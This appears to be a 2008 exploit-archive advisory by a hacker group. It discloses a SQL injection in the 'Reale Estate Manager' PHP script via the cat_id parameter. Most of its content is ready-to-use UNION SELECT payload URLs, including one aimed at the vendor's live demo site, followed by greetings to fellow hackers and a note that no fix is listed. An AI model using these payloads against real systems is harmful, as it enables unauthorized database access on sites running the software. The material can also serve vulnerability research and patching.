Real Estate Manager (cat_id) Remote SQL injection vulnerability

2008-09-27 21:01:03

####################################################################################################
# Reale Estate Manager Remote SQL injection vulnerability #
# Ghost Hacker , Real Hack Back #
####################################################################################################
#[~] Author : Ghost Hacker #
#[~] My Home : http://Real-h.com [Real Hack Back] #
#[~] Contact Me : [email protected] #
#[~] Bug : Remote SQL injection #
#[~] Name Script : Reale Estate Manager #
#[~] Download : http://realeastatephp.net/ #
####################################################################################################
#[~] dork : #
# ;) #
#[~] Exploit : #
# http://127.0.0.1/?lang=en&tpl=default&mode=browse&cat_id=-25+union+select+1-- #
#[~] Example : #
# http://127.0.0.1/?lang=en&tpl=default&mode=browse&cat_id=-25+union+select+version()-- #
# [~] Live Demo : #
# http://realeastatephp.net/demo/?lang=en&tpl=default&mode=browse&cat_id=-25+union+select+version()--
####################################################################################################
#[~]Greets : #
# Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar al3noOoz , L&J TeaM #
# HitleR 07 , D3is Hacker , RoMaNcYxHaCkEr , Mr.PaTcH , Mr.MN7oS , Mr.Hope , EgYpTiaN x HaCkEr #
# All Members Real Hack and Members Arab Security , All My Friends ! #
####################################################################################################
# i am, Abu YASSER #
####################################################################################################

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.